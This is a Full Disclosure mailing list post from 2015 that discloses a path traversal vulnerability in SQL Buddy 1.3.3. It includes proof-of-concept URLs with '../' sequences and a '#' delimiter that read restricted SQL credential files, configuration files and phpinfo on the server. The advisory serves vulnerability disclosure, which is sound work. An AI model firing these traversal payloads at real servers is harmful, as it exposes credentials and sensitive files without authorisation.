Full Disclosure mailing list archives

By Date By Thread Sqlbuddy Path Traversal Vulnerability From: John Page <hyp3rlinx () gmail com>

Date: Sat, 9 May 2015 18:57:42 -0400

Read arbitrary server files: Affected Vendor: www.sqlbuddy.com Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt Product: sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL administration application. Advisory Information: ============================== sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. .doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx> POC exploits: ======================= 1-Read from Apache restricted directory under htdocs: http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo Disclosure Timeline: ================================== Vendor Notification N/A May 9, 2015: Public Disclosure - hyp3rlinx Exploitation Technique: ======================= Create a test file with non .php extension in some htdocs directory then request the page in the browser. http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt# Severity Level: =============== High Description: ========================== Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=[somefile] Affected Area(s): [+] Server directories & sensitive files =============================== (hyp3rlinx) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Sqlbuddy Path Traversal Vulnerability John Page (May 09)